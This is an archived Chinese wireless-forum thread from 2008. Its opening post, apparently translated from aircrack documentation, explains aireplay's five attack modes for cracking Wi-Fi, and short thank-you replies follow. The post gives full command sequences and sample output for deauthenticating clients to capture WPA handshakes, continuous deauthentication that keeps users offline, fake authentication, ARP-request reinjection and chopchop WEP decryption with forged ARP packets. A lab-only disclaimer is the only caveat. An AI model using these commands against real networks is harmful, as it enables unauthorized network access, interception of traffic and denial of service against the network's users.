ubnt解决方案
查看: 102894|回复: 1198

!破解关键!aireplay详述!!

[复制链接]

19

回帖

163

积分

3 小时

在线时间

上等兵

注册时间
2008-2-7
金币
120 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 07:01 |显示全部楼层

本文大部分翻译自aircrackpack的作者,仅在实验室环境中测试,请勿用于非法尝试。

有一定经验的人,应该知道aireplay在破解中所起的作用。

如果你在实验中屡屡受挫,下面的内容应对你有用。

aireplay有5种攻击模式,对应于不同情况。下面一一说来:

在下面的例子中,00:13:10:30:24:9C 是AP(无线路由) 的MAC 地址(on channel 6), 00:09:5B:EB:C5:2B 是客户的MAC address

+ Attack 0: deauthentication

这种攻击模式强制断开客户端与路由端的连接,使其重新连接,在此期间,可以捕获WAP 的handshakes,以及WEP的有效ivs,并产生有效ARP攻击(配合-3攻击)。这在实践中是非常有效的。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3(见下面具体内容)也无法产生有效ARP攻击。如果在-3的同时,另外进行-0 攻击,-3攻击会被立刻激活。

显而易见,如果没有客户端是不成的。

Some examples:

o WPA Handshake capture with an Atheros

airmon.sh start ath0
airodump ath0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
(wait for a few seconds)
aircrack -w /path/to/dictionary out.cap

o ARP request generation with a Prism2 card

airmon.sh start wlan0
airodump wlan0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

aireplay -0 5 ------进行五次攻击,如果为0,则循环攻击,客户端无法正常上网,不停的断开连接。

-a 后是路由的mac地址。可以加 -h 后为攻击的客户端的mac地址,也可以不加。

wlan0 为自己的网卡名。用ifconfig -a 看,也可以是wifi0,ath1等等。有很多帖子都有叙述,这里就不再多说了。

+ Attack 1: fake authentication

这种攻击在没有合法客户端与路由相连时有些用处,这里我们伪装了一个客户端并使之育路由连接。这个操作可以配合 -3 (ARP request reinjection)和 -4 ("chopchop" WEP decryption).使用。如果,有客户端,则针对客户端使用-3 或 -4 更为有效。

实际上,如果没有客户端的话,这种攻击很可能没有效果。

aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

+---------------------------------------------------------------------+
| With patched madwifi CVS 2005-08-14, it's possible to inject |
| packets while in Managed mode (the WEP key itself doesn't matter, |
| as long as the AP accepts Open-System authentication). So, instead |
| of running attack 1, you may just associate and inject / monitor |
| through the athXraw interface: |
| |
| ifconfig ath0 down hw ether 00:10:20:30:40:50 |
| iwconfig ath0 mode Managed essid myap key AAAAAAAAAA |
| ifconfig ath0 up |
| |
| sysctl -w dev.ath0.rawdev=1 |
| ifconfig ath0raw up |
| airodump ath0raw out 6 |
| |
| Then you can run attack 3 or 4 (aireplay will automatically replace |
| ath0 with ath0raw below): |
| |
| aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0 |
| aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0 |
| |
+---------------------------------------------------------------------+

Some access points require to reassociate every 30 seconds, otherwise
our fake client is considered disconnected. In this case, setup the
periodic re-association delay:

aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0


+ Attack 2: interactive packet replay

这种攻击模式几本无用,只是某些时候做测试用。

aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0

+ Attack 3: ARP-request reinjection

这种攻击模式是最为有效的。这里你既可以利用合法客户端,也可以配合-1 利用伪装客户端。一般情况下,你需要等几分钟直到出现有效ARP request. 如果没有任何通信存在,则这种攻击就会失败。在实践中,如果合法客户端和路由之间长时间内没有ARP request,可以尝试同时使用-0 攻击。

Please note that you can also reuse ARP requests from a previous
capture using the -r switch.

aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

+ Attack 4: KoreK's "chopchop" (CRC prediction)

这种攻击模式不常用,但是一旦成果,则可以在不知道密码的情况下破解WEP包。

This attack, when successful, can decrypt a WEP data packet without
knowing the key. It can even work against dynamic WEP. This attack does
not recover the WEP key itself, but merely reveals the plaintext.
However, most access points are not vulnerable at all. Some may seem
vulnerable at first but actually drop data packets shorter that 60
bytes. This attack requires at least one WEP data packet.

1. First, we decrypt one packet :

aireplay -4 -h 00:09:5B:EB:C5:2B ath0

2. Let's have a look at the IP address :

tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request.

The source IP (192.168.1.100) doesn't matter, but the destination
IP (192.168.1.2) must respond to ARP requests. The source MAC must
belong to an associated station.

./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. And replay our forged ARP request :

aireplay -2 -r arp.cap ath0

————————————————————————
去除回复可见,并加此贴为精华。Tange/2008.6.4

[此贴子已经被tange于2008-6-4 23:22:40编辑过]

21

回帖

151

积分

21 小时

在线时间

上等兵

注册时间
2007-8-1
金币
127 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 07:07 |显示全部楼层
:) 俺破自家的 wep, 破的 莫明其妙~~ :) 看看学习先!
回复

使用道具 举报

5

回帖

68

积分

1 小时

在线时间

新兵上阵

注册时间
2008-2-20
金币
61 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 07:29 |显示全部楼层

需要学习!我要看

回复

使用道具 举报

71

回帖

647

积分

0 小时

在线时间

中尉

注册时间
2008-2-3
金币
567 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 09:56 |显示全部楼层
这个好啊~!哈哈哈~~!有用
回复

使用道具 举报

8

回帖

73

积分

1 小时

在线时间

新兵上阵

注册时间
2008-2-20
金币
64 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 10:14 |显示全部楼层
谢谢 看看学习下
回复

使用道具 举报

48

回帖

368

积分

70 小时

在线时间

少尉

注册时间
2007-11-21
金币
309 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 10:20 |显示全部楼层

学习下

回复

使用道具 举报

39

回帖

181

积分

10 小时

在线时间

上等兵

注册时间
2008-1-11
金币
141 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 10:49 |显示全部楼层
一定要好好学习一下!!!
回复

使用道具 举报

319

回帖

1699

积分

101 小时

在线时间

上尉

注册时间
2006-8-9
金币
1259 个
威望
6 个
荣誉
6 个

尚未签到

发表于 2008-2-21 10:49 |显示全部楼层
发贴心情
谢谢 学习下
回复

使用道具 举报

534

回帖

2834

积分

745 小时

在线时间

少校

注册时间
2006-9-29
金币
2170 个
威望
10 个
荣誉
0 个
累计签到:111 天
连续签到:0 天
[LV.200]无线新星
发表于 2008-2-21 11:23 |显示全部楼层

一定要学习一下哦!!

回复

使用道具 举报

327

回帖

2900

积分

145 小时

在线时间

少校

小皮

注册时间
2007-11-7
金币
2479 个
威望
8 个
荣誉
0 个
累计签到:9 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2008-2-21 11:32 |显示全部楼层
[em67][em67][em67][em67][em67][em67][em67]
回复

使用道具 举报

9

回帖

101

积分

0 小时

在线时间

上等兵

注册时间
2007-12-3
金币
91 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-2-21 11:54 |显示全部楼层
新手学习,各高手致敬!
回复

使用道具 举报

700

回帖

1万

积分

107 小时

在线时间

VIP

终身荣誉会员终身荣誉版主

注册时间
2007-12-8
金币
11440 个
威望
28 个
荣誉
0 个

尚未签到

发表于 2008-2-21 11:59 |显示全部楼层
呵呵,要人气固然是很重要的!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-12-24 11:51

返回顶部 返回列表